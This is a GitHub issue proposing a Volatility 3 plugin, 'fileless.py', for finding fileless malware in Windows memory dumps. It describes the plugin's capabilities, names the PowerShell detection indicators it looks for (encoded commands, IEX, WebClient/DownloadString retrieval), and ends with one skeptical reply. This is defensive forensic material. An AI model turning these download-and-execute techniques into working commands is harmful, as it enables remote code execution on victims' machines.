volatility3 icon indicating copy to clipboard operation
volatility3 copied to clipboard
verified publisher icon volatilityfoundation

Fileless Malware Hunter Volatility3 Plugin

Open malfav opened this issue 1 month ago • 1 comments

fileless.py – Advanced Fileless Malware Hunter (Volatility 3 Plugin)

fileless.py is a dedicated Volatility 3 plugin built for advanced forensic analysis of Windows memory dumps.
Its primary focus is detecting and reporting threats related to fileless malware, in-memory injection, and other stealthy attack techniques that evade traditional disk-based antivirus detection.

Key Capabilities

Fileless Threat Detection

Scans memory artifacts to uncover indicators of fileless attacks, including:

  • Reflective DLL loading and process injection
  • In-memory PowerShell and script-based payloads
  • Heavily obfuscated or encoded commands

Enhanced PowerShell Analysis

Employs a comprehensive set of regular expressions (POWERSHELL_PATTERNS) to detect malicious PowerShell behavior, such as:

  • Use of -encodedcommand with high-entropy or base64-encoded strings
  • Invocation of Invoke-Expression (IEX) for dynamic code execution
  • Network payload retrieval via .Net.WebClient or DownloadString calls

In-Memory Artifact Scanning

Leverages Volatility 3’s core analysis modules (pslist, vadinfo, handles) to identify suspicious or anomalous memory regions:

  • Detection of memory hollowing and unsigned code injection
  • Correlation of Virtual Address Descriptors (VADs) with process metadata
  • Identification of mismatched or hidden modules

Structured Forensic Reporting

Automatically generates a detailed TreeGrid-style report that presents findings in a structured and analyst-friendly format for triage and incident response.

Reporting and Triage

The plugin provides automated scoring and classification of detected threats to accelerate analysis:

Report Column Description
Detection Type Category of the threat (e.g., PowerShell Encoded Command, Suspicious Memory Region)
Severity Risk rating to prioritize analysis (Critical, High, Medium)
MITRE ATT&CK Maps identified behaviors to MITRE ATT&CK techniques for adversary tracking and intelligence correlation
Indicator The exact pattern, command, or string that triggered the detection (e.g., base64-encoded command string)

malfav avatar Nov 10 '25 21:11 malfav

this screams AI and also the plugin is basically malfind with additional basic YARA malware families .-.

SolitudePy avatar Nov 13 '25 20:11 SolitudePy